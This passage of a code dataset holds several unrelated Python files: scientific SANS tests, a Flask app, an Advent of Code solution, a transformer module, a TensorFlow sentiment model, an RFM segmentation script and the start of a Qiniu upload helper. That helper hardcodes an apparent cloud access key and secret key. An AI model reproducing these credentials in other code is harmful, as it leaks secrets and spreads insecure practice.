TransmissionSample(Trans_Sample, Trans_Direct, False)\n AssignCan(Can, False)\n TransmissionCan(CanTrans_Sample, CanTrans_Direct, False)\n \n WavRangeReduction(3, 9, DefaultTrans)\n\n def validate(self):\n # Need to disable checking of the Spectra-Detector map becauseit isn't\n # fully saved out to the nexus file (it's limited to the spectra that\n # are actually present in the saved workspace).\n self.disableChecking.append('SpectraMap')\n self.disableChecking.append('Axes')\n self.disableChecking.append('Instrument')\n\n return '54431main_1D_3.0_9.0','LOQCentreNoGrav.nxs'\n \n\nclass SANSLOQCan2DReloadWorkspace(stresstesting.MantidStressTest):\n \n def runTest(self):\n config[\"default.instrument\"] = \"LOQ\" \n LOQ()\n Set2D()\n Detector(\"main-detector-bank\")\n MaskFile('MASK.094AA')\n # apply some small artificial shift\n SetDetectorOffsets('REAR', -1.0, 1.0, 0.0, 0.0, 0.0, 0.0) \n Gravity(True)\n sample = Load('99630')\n can = Load('99631')\n AssignSample(sample, False)\n AssignCan(can, False)\n \n WavRangeReduction(None, None, False)\n\n \n def validate(self):\n # Need to disable checking of the Spectra-Detector map because it isn't\n # fully saved out to the nexus file (it's limited to the spectra that\n # are actually present in the saved workspace).\n self.disableChecking.append('SpectraMap')\n self.disableChecking.append('Instrument')\n #when comparing LOQ files you seem to need the following\n self.disableChecking.append('Axes')\n # the change in number is because the run number reported from 99630 is 53615\n return '53615main_2D_2.2_10.0','SANSLOQCan2D.nxs'\n\nclass SANS2DFrontNoGravReloadWorkspace(stresstesting.MantidStressTest):\n \n def runTest(self):\n config[\"default.instrument\"] = \"SANS2D\"\n SANS2D()\n MaskFile('MASKSANS2D_094i_RKH.txt')\n SetDetectorOffsets('REAR', -16.0, 58.0, 0.0, 0.0, 0.0, 0.0)\n SetDetectorOffsets('FRONT', -44.0, -20.0, 47.0, 0.0, 1.0, 1.0)\n Gravity(False)\n Set1D()\n Sample = LoadNexus('2500')\n AssignSample(Sample, False)\n WavRangeReduction(4.6, 12.85, False)\n\n def validate(self):\n self.disableChecking.append('SpectraMap')\n self.disableChecking.append('Axes')\n self.disableChecking.append('Instrument')\n return '2500front_1D_4.6_12.85','SANS2DFrontNoGrav.nxs'\n\nclass SANS2DWaveloopsReloadWorkspace(stresstesting.MantidStressTest):\n \n def runTest(self):\n config[\"default.instrument\"] = \"SANS2D\"\n SANS2D()\n MaskFile('MASKSANS2D.091A')\n Gravity(True)\n Set1D()\n s = Load('992')\n s_t = Load('988')\n direct = Load('987')\n direct_can = CloneWorkspace(direct)\n c = Load('993')\n c_t = Load('989') \n AssignSample(s,False)\n TransmissionSample(s_t, direct, False)\n AssignCan(c, False)\n TransmissionCan(c_t, direct_can, False)\n\n CompWavRanges([3, 5, 7, 11], False)\n \n def validate(self):\n self.disableChecking.append('SpectraMap')\n self.disableChecking.append('Axes')\n self.disableChecking.append('Instrument')\n # testing one of the workspaces that is produced, best not to choose the \n # first one in produced by the loop as this is the least error prone\n return '992rear_1D_7.0_11.0','SANS2DWaveloops.nxs'\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mantidproject/systemtests","sub_path":"SystemTests/AnalysisTests/SANS2DLOQReloadWorkspaces.py","file_name":"SANS2DLOQReloadWorkspaces.py","file_ext":"py","file_size_in_byte":12358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12539214792","text":"from .app import Flask\n\n\ndef register_blueprints(app):\n from DRcode.app.api import create_blueprint\n app.register_blueprint(create_blueprint(), url_prefix='/v1')\n\n\ndef create_global_var():\n import DRcode.app.libs.global_var as gl\n gl.set_value('state', 'WAITING')\n gl.set_value('stop', 0)\n gl.set_value('start', 0)\n gl.set_value('camera_open', False)\n gl.set_value('camera_connecting', True)\n gl.set_value('camera_ip', '')\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object('DRcode.app.config.setting')\n app.config.from_object('DRcode.app.config.secure')\n register_blueprints(app)\n return app\n\n\ndef check_ps():\n return True\n # os.system('sudo pkill -f python3')\n # key_work = '\\\"sudo python3 /home/pi/DRrobot/DRrobot.py\\\"'\n # instruct = 'ps -aux | grep ' + key_work\n # key_line = os.popen(instruct).read()\n # ps_num = key_line[6:14].strip()\n # instruct = 'sudo kill -9' + ps_num\n # os.system(instruct)\n # # key_work = 'sudo python3'\n # instruct = 'sudo killall -9 sudo python3'\n # os.system('sudo killall -9 sudo python3')\n # os.system('nohup sudo python3 -u /home/pi/DRrobot/DRrobot.py >output.txt 2>&1 &')\n","repo_name":"fsmenyao/DRrobot","sub_path":"DRcode/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12576452465","text":"def parse_tiles(tiles):\n c = regex.compile(r\"^(e|se|sw|w|nw|ne)*$\")\n return c.match(tiles).captures(1)\n\n\nwith open(\"input\") as f:\n tiles_to_flip = list(map(parse_tiles, f.read().strip().split(\"\\n\")))\n\n\ndef calc_pos(tile):\n pos = [0, 0]\n for direction in tile:\n if direction == \"e\":\n pos[0] += 1\n pos[1] += 0\n elif direction == \"se\":\n pos[0] += 1\n pos[1] += 1\n elif direction == \"sw\":\n pos[0] += 0\n pos[1] += 1\n elif direction == \"w\":\n pos[0] += -1\n pos[1] += 0\n elif direction == \"nw\":\n pos[0] += -1\n pos[1] += -1\n elif direction == \"ne\":\n pos[0] += 0\n pos[1] += -1\n return tuple(pos)\n\n\nblack_tiles = set()\n\nfor tile in tiles_to_flip:\n pos = calc_pos(tile)\n if pos in black_tiles:\n black_tiles.remove(pos)\n else:\n black_tiles.add(pos)\n\nprint(len(black_tiles))\n\n\ndef get_neighbors(pos):\n neighbors = set()\n neighbors.add((pos[0] + 1, pos[1] + 1))\n neighbors.add((pos[0] + 0, pos[1] + 1))\n neighbors.add((pos[0] + 1, pos[1] + 0))\n neighbors.add((pos[0] + 0, pos[1] + -1))\n neighbors.add((pos[0] + -1, pos[1] + 0))\n neighbors.add((pos[0] + -1, pos[1] + -1))\n return neighbors\n\n\ndef flip_tiles(black_tiles):\n new_black_tiles = set()\n white_tiles_to_check = set()\n for black_tile in black_tiles:\n neighbors = get_neighbors(black_tile)\n black_neighbors = set()\n for n in neighbors:\n if n in black_tiles:\n black_neighbors.add(n)\n else:\n white_tiles_to_check.add(n)\n if len(black_neighbors) == 1 or len(black_neighbors) == 2:\n new_black_tiles.add(black_tile)\n for white_tile in white_tiles_to_check:\n neighbors = get_neighbors(white_tile)\n black_neighbors = neighbors.intersection(black_tiles)\n if len(black_neighbors) == 2:\n new_black_tiles.add(white_tile)\n\n return new_black_tiles\n\n\nfor x in range(100):\n black_tiles = flip_tiles(black_tiles)\n print(f\"Day {x + 1}: {len(black_tiles)}\")\n","repo_name":"alejandro-myriad/advent_of_code","sub_path":"2020/day24_alejandro/day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"10244217174","text":"\"\"\"\nGPT model\n- the initial stem consists of a combination of token encoding and a positional encoding\n- the meat of it is a uniform sequence of Transformer blocks\n - each Transformer is a sequential combination of a 1-hidden-layer MLP block and a self-attention block\n - all blocks feed into a central residual pathway similar to resnets\n- the final decoder is a linear projection into a vanilla Softmax classifier\n\"\"\"\n\nimport math\nimport logging\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport numpy as np\nfrom ..builder import HEADS\n\nlogger = logging.getLogger(__name__)\n\n\nclass CausalSelfAttention(nn.Module):\n \"\"\"\n A vanilla multi-head masked self-attention layer with a projection at the end.\n It is possible to use torch.nn.MultiheadAttention here but I am including an\n explicit implementation here to show that there is nothing too scary here.\n \"\"\"\n\n def __init__(self,\n n_embd=512,\n n_head=8,\n block_size=100,\n attn_pdrop=0.1,\n resid_pdrop=0.1):\n super().__init__()\n assert n_embd % n_head == 0\n # key, query, value projections for all heads\n self.key = nn.Linear(n_embd, n_embd)\n self.query = nn.Linear(n_embd, n_embd)\n self.value = nn.Linear(n_embd, n_embd)\n # regularization\n self.attn_drop = nn.Dropout(attn_pdrop)\n self.resid_drop = nn.Dropout(resid_pdrop)\n # output projection\n self.proj = nn.Linear(n_embd, n_embd)\n # causal mask to ensure that attention is only applied to the left in the input sequence\n self.register_buffer(\"mask\", torch.tril(torch.ones(block_size, block_size))\n .view(1, 1, block_size, block_size))\n self.n_head = n_head\n\n def forward(self, x, layer_past=None):\n B, T, C = x.size()\n\n # calculate query, key, values for all heads in batch and move head forward to be the batch dim\n k = self.key(x).view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)\n q = self.query(x).view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)\n v = self.value(x).view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)\n\n # causal self-attention; Self-attend: (B, nh, T, hs) x (B, nh, hs, T) -> (B, nh, T, T)\n att = (q @ k.transpose(-2, -1)) * (1.0 / math.sqrt(k.size(-1)))\n att = att.masked_fill(self.mask[:,:,:T,:T] == 0, float('-inf'))\n att = F.softmax(att, dim=-1)\n att = self.attn_drop(att)\n y = att @ v # (B, nh, T, T) x (B, nh, T, hs) -> (B, nh, T, hs)\n y = y.transpose(1, 2).contiguous().view(B, T, C) # re-assemble all head outputs side by side\n\n # output projection\n y = self.proj(y)\n y = self.resid_drop(y)\n return y\n\n\nclass Block(nn.Module):\n \"\"\" an unassuming Transformer block \"\"\"\n\n def __init__(self,\n n_embd=512,\n n_head=8,\n block_size=100,\n attn_pdrop=0.1,\n resid_pdrop=0.1):\n super().__init__()\n self.ln1 = nn.LayerNorm(n_embd)\n self.ln2 = nn.LayerNorm(n_embd)\n self.attn = CausalSelfAttention(\n n_embd, n_head, block_size, attn_pdrop, resid_pdrop)\n self.mlp = nn.Sequential(\n nn.Linear(n_embd, 4 * n_embd),\n nn.GELU(),\n nn.Linear(4 * n_embd, n_embd),\n nn.Dropout(resid_pdrop),\n )\n\n def forward(self, x):\n x = x + self.attn(self.ln1(x))\n x = x + self.mlp(self.ln2(x))\n return x\n\n\n@HEADS.register_module()\nclass BboxEncoder(nn.Module):\n \"\"\" the full GPT language model, with a context size of block_size \"\"\"\n\n def __init__(self,\n n_layer=12,\n n_head=8,\n n_embd=512,\n bbox_cord_dim=4,\n bbox_max_num=512,\n embd_pdrop=0.1,\n attn_pdrop=0.1,\n resid_pdrop=0.1):\n super(BboxEncoder, self).__init__()\n\n # input embedding stem\n # self.tok_emb = nn.Embedding(vocab_size, n_embd)\n # self.pos_emb = nn.Parameter(torch.zeros(1, block_size, n_embd))\n self.bbox_embedding = nn.Sequential(\n nn.Linear(bbox_cord_dim, n_embd),\n nn.Linear(n_embd, n_embd),\n nn.Dropout(embd_pdrop)\n )\n \n # transformer \n self.blocks = nn.Sequential(\n *[Block(n_embd, n_head, bbox_max_num, \n attn_pdrop, resid_pdrop) for _ in range(n_layer)])\n\n # decoder head\n self.ln_f = nn.LayerNorm(n_embd)\n self.head = nn.Linear(n_embd, n_embd, bias=False)\n\n self.block_size = bbox_max_num\n self.apply(self._init_weights)\n\n logger.info(\"number of parameters: %e\", \n sum(p.numel() for p in self.parameters()))\n\n def get_block_size(self):\n return self.block_size\n\n def _init_weights(self, module):\n if isinstance(module, (nn.Linear, nn.Embedding)):\n module.weight.data.normal_(mean=0.0, std=0.02)\n if isinstance(module, nn.Linear) and module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.LayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n\n def forward(self, xs):\n out = []\n for x in xs:\n bbox_num, bbox_dim = x.size()\n\n assert bbox_num <= self.block_size, \"Cannot forward, model block size is exhausted.\"\n\n # if x.is_cuda:\n # device = x.get_device()\n # else:\n # device = 'cpu'\n\n # if bbox_num >= self.block_size:\n # x = x[:,:self.block_size,:]\n # else:\n # zero_cat = torch.Tensor(\n # np.zeros([b,self.block_size-bbox_num,bbox_dim]), \n # dtype=np.float32, \n # device=device)\n # x = torch.cat((x,zero_cat),dim=1)\n # forward the GPT model\n x = x.unsqueeze(0)\n bbox_repr = self.bbox_embedding(x)\n print(\"bbox_repr, \", bbox_repr.max(), bbox_repr.min(), bbox_repr.mean(), bbox_repr.std())\n #bbox_repr --> [b, box_num, 512]\n x = self.blocks(bbox_repr)\n x = self.ln_f(x)\n logits = self.head(x)\n print(\"logits, \", logits.max(), logits.min(), logits.mean(), logits.std())\n out.append(logits.squeeze(0))\n return out\n","repo_name":"pengyu965/ChartDete","sub_path":"mmdet/models/roi_heads/bbox_encoding_transformer_old.py","file_name":"bbox_encoding_transformer_old.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
+{"seq_id":"36672006509","text":"#!/usr/bin/python\n\n\"\"\"Test of radio button output using Firefox.\n\"\"\"\n\nfrom macaroon.playback import *\nimport utils\n\nsequence = MacroSequence()\n\n########################################################################\n# We wait for the focus to be on a blank Firefox window.\n#\nsequence.append(WaitForWindowActivate(utils.firefoxFrameNames, None))\n\n########################################################################\n# Open the \"File\" menu and press P for the Print dialog\n#\nsequence.append(utils.StartRecordingAction())\nsequence.append(KeyComboAction(\"f\"))\nsequence.append(PauseAction(3000))\nsequence.append(KeyComboAction(\"p\"))\nsequence.append(PauseAction(3000))\n\n########################################################################\n# Press Alt A to jump to the radio button group\n#\nsequence.append(utils.StartRecordingAction())\nsequence.append(KeyComboAction(\"a\"))\nsequence.append(utils.AssertPresentationAction(\n \"Alt a to radio button group\",\n [\"BRAILLE LINE: '\" + utils.firefoxAppNames + \" Application Print Dialog TabList General Page Range &=y All Pages RadioButton'\",\n \" VISIBLE: '&=y All Pages RadioButton', cursor=1\",\n \"SPEECH OUTPUT: 'Range All Pages selected radio button'\"]))\n\n########################################################################\n# Do a basic \"Where Am I\" via KP_Enter. \n#\nsequence.append(utils.StartRecordingAction())\nsequence.append(KeyComboAction(\"KP_Enter\"))\nsequence.append(PauseAction(3000))\nsequence.append(utils.AssertPresentationAction(\n \"Basic Where Am I\", \n [\"BRAILLE LINE: '\" + utils.firefoxAppNames + \" Application Print Dialog TabList General Page Range &=y All Pages RadioButton'\",\n \" VISIBLE: '&=y All Pages RadioButton', cursor=1\",\n \"SPEECH OUTPUT: 'Range All Pages radio button selected 1 of 4.'\",\n \"SPEECH OUTPUT: 'Alt a'\"]))\n\n########################################################################\n# Dismiss the dialog by pressing Escape and wait for the location bar\n# to regain focus.\nsequence.append(KeyComboAction(\"Escape\"))\nsequence.append(WaitForFocus(acc_role=pyatspi.ROLE_ENTRY))\n\n# Just a little extra wait to let some events get through.\n#\nsequence.append(PauseAction(3000))\n\nsequence.append(utils.AssertionSummaryAction())\n\nsequence.start()\n","repo_name":"h4ck3rm1k3/orca-sonar","sub_path":"test/keystrokes/firefox/xul_role_radio_button.py","file_name":"xul_role_radio_button.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"6793132961","text":"# https://stackoverflow.com/questions/8955448/save-load-scipy-sparse-csr-matrix-in-portable-data-format\n# https://machinelearningmastery.com/sparse-matrices-for-machine-learning/\n# https://sparse.pydata.org/en/latest/generated/sparse.COO.html#sparse.COO\n'''\n Various utils\n'''\nimport time\n\nimport numpy as np\nimport sparse\n\n\ndef now():\n return str(time.strftime('%Y-%m-%d %H:%M:%S'))\n\n\ndef get_line_count(file):\n cnt = 0\n with open(file) as fin:\n for _ in fin:\n cnt += 1\n return cnt\n\n\ndef json_serializer(o):\n '''\n json serializer that handles numpy int\n '''\n if isinstance(o, np.int64): return int(o)\n raise TypeError\n\n\n# get all pairs from a list\ndef enumerate_all_pairs(items):\n \"\"\"Make all unique pairs (order doesn't matter)\"\"\"\n pairs = []\n nitems = len(items)\n for i, wi in enumerate(items):\n for j in range(i + 1, nitems):\n pairs.append((wi, items[j]))\n return pairs\n\n\n# def i2w(s):\n# return [vocab[i] for i in s]\n\ndef flatten(list):\n r_list = []\n for sublist in list:\n r_list.extend(sublist)\n return r_list\n\n\n# from scipy.sparse import lil_matrix\n\n\ndef list_to_sparse_dict(target_list):\n x = np.array(target_list)\n s = sparse.COO(x)\n result = {\n \"dtype\": s.dtype.str,\n \"shape\": s.shape,\n \"data\": s.data.tolist(),\n \"coords\": s.coords.tolist()\n }\n return result\n\n\ndef array_from_sparse_dict(sparse_dict):\n coords = np.array(sparse_dict['coords'])\n data = np.array(sparse_dict['data'])\n # dtype = sparse_dict['dtype']\n shape = tuple(sparse_dict['shape'])\n s = sparse.COO(coords=coords, data=data, shape=shape)\n array = s.todense()\n return array\n","repo_name":"zhw12/AlgMap","sub_path":"common/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"}
+{"seq_id":"7372844027","text":"import tensorflow as tf\nimport numpy as np\nimport glob #this will be useful when reading reviews from file\nimport os\nimport tarfile\nimport re\nimport math\n\nbatch_size = 50\nstrip_special_chars = re.compile(\"[^A-Za-z0-9 ]+\")\nmaxColumn = 40\n\nnumClasses = 2\ndata = []\ndef cleanSentences(string):\n stopwords=[\"a\", \"an\", \"and\", \"are\", \"as\", \"at\", \"be\", \"but\", \"by\", \"for\",\"from\",\"if\", \"in\", \"into\", \"is\", \"it\",\n \"no\", \"not\", \"of\", \"on\", \"or\", \"such\",\n \"that\", \"the\", \"their\", \"then\", \"there\", \"these\",\n \"they\", \"this\", \"to\", \"was\", \"will\", \"with\"]\n words = [w.replace(w, '') if w in stopwords else w for w in string.split()]\n string = ' '.join(words)\n string = string.lower().replace(\" \", \" \")\n #REMOVE STOP WORDS\n return re.sub(strip_special_chars, \"\", string.lower())\n\ndef load_data(glove_dict):\n \"\"\"\n Take reviews from text files, vectorize them, and load them into a\n numpy array. Any preprocessing of the reviews should occur here. The first\n 12500 reviews in the array should be the positive reviews, the 2nd 12500\n reviews should be the negative reviews.\n RETURN: numpy array of data with each row being a review in vectorized\n form\"\"\"\n global data\n folders=['pos','neg']\n\n maxReviews = 12500\n count=0\n if not (os.path.isdir(folders[0]) and os.path.isdir(folders[1])):\n tar = tarfile.open(\"reviews.tar\")\n tar.extractall()\n tar.close()\n for folder in folders:\n for element in os.listdir(folder):\n with open(folder + '/'+element,'r',encoding=\"utf-8\") as file:\n review = [glove_dict[word] for word in cleanSentences(file.read()).split() if word in glove_dict][:maxColumn]\n if len(review) < maxColumn:\n review.extend([0]*(maxColumn - len(review)))\n data.append(review)\n data = np.array(data)\n return data\n\n\ndef load_glove_embeddings():\n \"\"\"\n Load the glove embeddings into a array and a dictionary with words as\n keys and their associated index as the value. Assumes the glove\n embeddings are located in the same directory and named \"glove.6B.50d.txt\"\n RETURN: embeddings: the array containing word vectors\n word_index_dict: a dictionary matching a word in string form to\n its index in the embeddings array. e.g. {\"apple\": 119\"}\n \"\"\"\n #data = open(\"glove.6B.50d.txt\",'r',encoding=\"utf-8\")\n #if you are running on the CSE machines, you can load the glove data from here\n #data = open(\"/home/cs9444/public_html/17s2/hw2/glove.6B.50d.txt\",'r',encoding=\"utf-8\")\n word_index_dict={};\n embeddings=[];\n temp=[];\n i=0\n with open(\"glove.6B.50d.txt\",'r',encoding=\"utf-8\") as file:\n for line in file:\n temp = line.strip().split(\" \",1)\n embeddings.append(np.fromstring(temp[1], dtype=np.float32, sep=' '))\n word_index_dict[temp[0]]=i\n i=i+1\n embeddings.append(np.array([0] * 50,dtype=np.float32))\n word_index_dict['UNK']=len(embeddings)-1\n return np.array(embeddings), word_index_dict\n\n\ndef define_graph(glove_embeddings_arr):\n \"\"\"\n Define the tensorflow graph that forms your model. You must use at least\n one recurrent unit. The input placeholder should be of size [batch_size,\n 40] as we are restricting each review to it's first 40 words. The\n following naming convention must be used:\n Input placeholder: name=\"input_data\"\n labels placeholder: name=\"labels\"\n accuracy tensor: name=\"accuracy\"\n loss tensor: name=\"loss\"\n\n RETURN: input placeholder, labels placeholder, optimizer, accuracy and loss\n tensors\"\"\"\n\n #data = glove_embeddings_arr\n lstmUnits = 64\n tf.reset_default_graph()\n labels = tf.placeholder(tf.float32, [batch_size, numClasses],name=\"labels\")\n input_data = tf.placeholder(tf.int32, [batch_size, maxColumn], name=\"input_data\")\n datax = tf.Variable(tf.zeros([batch_size, maxColumn,50]),dtype=tf.float32)\n datax = tf.nn.embedding_lookup(glove_embeddings_arr,input_data)\n dropout_keep_prob = tf.placeholder_with_default(1.0, shape=())\n with tf.device('/cpu:0'):\n lstmCell = tf.contrib.rnn.BasicLSTMCell(lstmUnits)\n\n lstmCell = tf.contrib.rnn.DropoutWrapper(cell=lstmCell, output_keep_prob=dropout_keep_prob)\n value, state = tf.nn.dynamic_rnn(lstmCell, datax, dtype=tf.float32)\n weight = tf.Variable(tf.truncated_normal([lstmUnits, numClasses]))\n bias = tf.Variable(tf.constant(0.1, shape=[numClasses]))\n value = tf.transpose(value, [1, 0, 2])\n last = tf.gather(value, int(value.get_shape()[0]) - 1)\n prediction = (tf.matmul(last, weight) + bias)\n correctPred = tf.equal(tf.argmax(prediction,1), tf.argmax(labels,1))\n accuracy = tf.reduce_mean(tf.cast(correctPred, tf.float32),name=\"accuracy\")\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=labels))\n #optimizer = tf.train.GradientDescentOptimizer(0.25).minimize(loss)\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n return input_data, labels, dropout_keep_prob, optimizer, accuracy, loss\n","repo_name":"avinash2fly/Sentiment-Analysis-on-IMDB-dataset","sub_path":"implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39832762153","text":"import datetime as dt\nimport pandas as pd\npd.set_option('display.max_columns', None)\n# pd.set_option('display.max_rows', None)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\ndf_ = pd.read_csv(\"/Users/birsenbayat/Desktop/miuul/PythonProgrammingForDataScience/CRM_Analitigi/FLOMusteriSegmentasyonu/flo_data_20k.csv\")\ndf = df_.copy()\n\n\ndf.head()\n\n#First look at data\n\ndf.head(10)\ndf.columns\ndf.shape\ndf.describe().T\ndf.isnull().sum()\ndf.dtypes\n\n#Omnichannel customers shop both online and offline platforms.\n#We create new variables for the total number of purchases and spending of each customer.\n\ndf[\"order_num_total\"] = df[\"order_num_total_ever_online\"] + df[\"order_num_total_ever_offline\"]\ndf[\"customer_value_total\"] = df[\"customer_value_total_ever_online\"] + df[\"customer_value_total_ever_offline\"]\n\ndf.head()\n\n#By examining the variable types, we convert the type of variables that express date to date.\ndf.dtypes\ndf[\"first_order_date\"] = df[\"first_order_date\"].apply(pd.to_datetime)\ndf[\"last_order_date\"] = df[\"last_order_date\"].apply(pd.to_datetime)\ndf[\"last_order_date_online\"] = df[\"last_order_date_online\"].apply(pd.to_datetime)\ndf[\"last_order_date_offline\"] = df[\"last_order_date_offline\"].apply(pd.to_datetime)\n\n#Let's look at the distribution of the number of customers in the shopping channels, the total number of products purchased, and the total expenditures.\nanalysing = df.groupby(\"order_channel\").agg({\"master_id\": \"count\",\n \"order_num_total\": \"sum\",\n \"customer_value_total\": \"sum\"})\n\n\n#Let's list the top 10 customers with the most revenue.\ndf.sort_values(by=\"customer_value_total\", ascending=False).head(10)\n\n#Let's list the top 10 customers with the most orders.\ndf.sort_values(by=\"order_num_total\", ascending=False).head(10)\n\n#Let's functionalize the data preparation process.\n\ndef dataset_preparing(dataframe):\n dataframe.dropna(inplace=True)\n dataframe[\"order_num_total\"] = dataframe[\"order_num_total_ever_online\"] + dataframe[\"order_num_total_ever_offline\"]\n dataframe[\"customer_value_total\"] = dataframe[\"customer_value_total_ever_online\"] + dataframe[\"customer_value_total_ever_offline\"]\n\n dataframe[\"first_order_date\"] = dataframe[\"first_order_date\"].apply(pd.to_datetime)\n dataframe[\"last_order_date\"] = dataframe[\"last_order_date\"].apply(pd.to_datetime)\n dataframe[\"last_order_date_online\"] = dataframe[\"last_order_date_online\"].apply(pd.to_datetime)\n dataframe[\"last_order_date_offline\"] = dataframe[\"last_order_date_offline\"].apply(pd.to_datetime)\n\n return dataframe\n\n#using function for data preparation\ndf = df_.copy()\ndf.head()\ndataset_preparing(df)\n\n#Calculating RFM Metrics\n#Step 1: We will define Recency, Frequency and Monetary.\n#Step 2: We will assign the metrics you calculated to a variable named rfm.\n\ndf[\"last_order_date\"].max() #we will find the last date ordered and decide on the analysis date.\n\ntoday_date = dt.datetime(2021, 6, 2)\n\nrfm = df.groupby(\"master_id\").agg({\"last_order_date\": lambda x: (today_date - x.max()).days,\n \"order_num_total\": \"sum\",\n \"customer_value_total\": \"sum\"})\n\nrfm.columns = [\"recency\", \"frequency\", \"monetary\"]\nrfm.head()\n\n#Calculation of RF Score\n#Step 1: We will convert the Recency, Frequency and Monetary metrics to scores between 1-5 with the help of qcut.\n\nrfm[\"recency_score\"] = pd.qcut(rfm[\"recency\"], 5, labels = [5, 4, 3, 2, 1])\nrfm[\"frequency_score\"] = pd.qcut(rfm[\"frequency\"].rank(method=\"first\"), 5, labels=[1, 2, 3, 4, 5])\nrfm[\"monetary_score\"] = pd.qcut(rfm[\"monetary\"], 5, labels=[1, 2, 3, 4, 5])\n\n#We will express recency_score and frequency_score as a single variable and save it as RF_SCORE.\nrfm[\"RF_SCORE\"] = (rfm[\"recency_score\"].astype(str) + rfm[\"frequency_score\"].astype(str))\nrfm.shape\n\n#Definition of RF Score as Segments\n#Step 1: We will make segment definitions for the generated RF scores.\n#Step 2: We will convert the scores into segments with the help of the seg_map below.\n\nseg_map = {\n r'[1-2][1-2]': 'hibernating',\n r'[1-2][3-4]': 'at_Risk',\n r'[1-2]5': 'cant_loose',\n r'3[1-2]': 'about_to_sleep',\n r'33': 'need_attention',\n r'[3-4][4-5]': 'loyal_customers',\n r'41': 'promising',\n r'51': 'new_customers',\n r'[4-5][2-3]': 'potential_loyalists',\n r'5[4-5]': 'champions'\n}\n\nrfm['segment'] = rfm['RF_SCORE'].replace(seg_map, regex=True)\nrfm.head()\nrfm.shape\n\n#Action\n\n#Step 1: Let's examine the recency, frequency and monetary averages of the segments.\n\nrfm[[\"segment\", \"recency\", \"frequency\", \"monetary\"]].groupby(\"segment\").agg([\"mean\", \"count\"])\n\n#Step 2: With the help of RFM analysis, let's find the customers in the relevant profile for the 2 cases given below and save the customer IDs as csv.\n#By presenting this csv file to the relevant units, we will ensure that work is done on these customers.\n\n#a. FLO includes a new women's shoe brand. The product prices of the brand it includes are above the general customer preferences.\n#For this reason, it is desired to contact the customers in the profile that will be interested in the promotion of the brand and product sales.\n#Those who shop from loyal customers (champions, loyal_customers) and women are the customers to be contacted privately.\n#Save the id numbers of these customers to the csv file.\n\nrfm = rfm.reset_index()\nrfm = rfm.merge(df[[\"master_id\", \"interested_in_categories_12\"]], how = 'left')\nrfm.head()\nrfm.shape\n\ndeneme = rfm.loc[((rfm[\"segment\"] == \"champions\") | (rfm[\"segment\"] == \"loyal_customers\")) & (rfm[\"interested_in_categories_12\"].str.contains(\"KADIN\")), [\"master_id\"]]\ndeneme.shape\ndeneme.head()\n\ndeneme.to_csv(\"rfm_a.csv\")\n\n#b.Nearly 40% discount is planned for Men's and Children's products. Previously interested in categories related to this discount\n#good customers but not to be lost customers who have not shopped for a long time, those who are asleep and new customers\n#want to be specifically targeted. Save the ids of the customers in the appropriate profile to the csv file.\n\ntarget_segments_customer_ids = rfm[rfm[\"segment\"].isin([\"cant_loose\",\"hibernating\",\"new_customers\"])][\"customer_id\"]\ncust_ids = df[(df[\"master_id\"].isin(target_segments_customer_ids)) & ((df[\"interested_in_categories_12\"].str.contains(\"ERKEK\"))|(df[\"interested_in_categories_12\"].str.contains(\"COCUK\")))][\"master_id\"]\ncust_ids.to_csv(\"indirim_hedef_müşteri_ids.csv\", index=False)\n\n#In this way, we have divided the customers into segments. By examining these segments in certain breakdowns, it is necessary to focus on which points \n#we can make the interpretation and reach the target audience customer. We can organize campaigns for the necessary segments, we can regain the necessary segments.\n","repo_name":"Birsenn/FLO_CRM_Analytics","sub_path":"FLO_RFM_Analysis.py","file_name":"FLO_RFM_Analysis.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24752468734","text":"import random\n\nfrom flask import session\nfrom qiniu import Auth, put_file, etag, put_data, BucketManager\nimport qiniu.config\n\nfrom apps.article.model import Article_type\nfrom apps.users.model import User\n\n\ndef upload_qiniu(filestorage):\n # 需要填写你的 Access Key 和 Secret Key\n access_key = '3kN7t5PKDJAKhdjZVSHhh7gOq8-Tuf9bc9mUYklE'\n secret_key = 'cAH0zVZQOfGfoQSa7AXPiAL7GN9JfxgqD5yeZOAZ'\n # 构建鉴权对象\n q = Auth(access_key, secret_key)\n # 要上传的空间\n bucket_name = 'zj-test-flask'\n # 上传后保存的文件名\n filename = filestorage.filename\n ran = random.randint(1, 1000)\n suffix = filename.rsplit('.')[-1]\n key = filename.rsplit('.')[0] + '_' + str(ran) + '.' + suffix\n # 生成上传 Token,可以指定过期时间等\n token = q.upload_token(bucket_name, key, 3600)\n # 要上传文件的本地路径\n # localfile = './sync/bbb.jpg'\n # ret, info = put_file(token, key, localfile)\n ret, info = put_data(token, key, filestorage.read())\n return ret, info\n\n\ndef delete_qiniu(filename):\n # 需要填写你的 Access Key 和 Secret Key\n access_key = 